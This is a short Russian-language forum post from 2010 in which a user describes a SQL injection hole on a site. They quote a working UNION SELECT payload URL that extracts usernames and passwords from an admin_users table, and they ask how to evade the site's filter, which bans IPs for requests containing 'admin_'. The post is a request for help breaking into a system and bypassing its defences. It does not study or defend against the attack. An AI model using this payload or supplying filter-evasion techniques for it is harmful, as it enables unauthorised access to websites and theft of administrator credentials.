01.12.2010, 21:07
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Есть простенькая SQL-иньекция, но сайт фильтрует(и сразу банит айпишник) все урлы, в которых проскакивает слово "admin_".
Т.е. запрос
Код:
http://site.com/index.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user,pass),3+from+admin_users/*
фильтруется. Остальные запросы идут без проблем. Идеи, как обойти?
Через POST скрипт параметры не берет. |
|
|